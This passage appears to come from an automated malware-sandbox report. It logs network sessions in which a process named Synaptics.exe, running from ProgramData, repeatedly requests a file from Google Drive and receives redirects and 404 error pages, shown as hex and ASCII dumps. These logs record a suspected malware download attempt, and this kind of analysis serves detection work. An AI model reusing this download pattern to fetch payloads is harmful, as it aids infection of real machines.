                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TtwUyU34mkmXl-tzgRDPOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    100192.168.2.452116142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:08 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5Qo9c_vMef2jjKXOqcAL0HOlUhgqZInvgijnHetd5OvG8EVNHrAzJobec0Dsse947z
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:08 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-flNP4RIhSWrxSlct6vMqeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:08 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:08 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 49 67 32 37 38 6c 43 73 61 58 45 52 70 5f 43 52 70 68 37 65 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="EIg278lCsaXERp_CRph7eQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:08 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    101192.168.2.452117142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:08 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:08 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-F2miNqEP2tE7YhNVJGBYHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    102192.168.2.452120142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:08 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:08 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7D7c9OXmTzIZWKrx5vybKNz0GilhjhEil1qCH9y9FtksUxsgXSrqYIata-_LCXsTSEDw57AFg
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:08 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-FHGTyycEjDHej5ucwjBPjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:08 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:08 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 77 47 61 36 54 46 6d 32 65 6f 36 52 31 53 50 52 76 38 58 45 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="jwGa6TFm2eo6R1SPRv8XEg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:08 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    103192.168.2.452121142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:08 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:08 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-A2Owd5vPfE_ujafTEaks_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    104192.168.2.452127142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:08 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:09 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TzuyNzXDGx9sm60KrWVOGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    105192.168.2.452130142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:09 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:09 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC5_Xk7OBajP2oyQyGWSSrcnmORJ9yWQ6PIJRtMYc2Rc23tmSKaz224N_XsHtcMymy-nyDdCTds
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:09 GMT
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-FfNn8Mw6_hIJlMpBf2eWwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:09 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                                    2024-12-30 10:52:09 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 6d 30 47 7a 79 55 62 69 5a 76 57 61 62 70 77 55 71 35 6d 54 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="dm0GzyUbiZvWabpwUq5mTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                                    2024-12-30 10:52:09 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    106192.168.2.452134142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:09 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
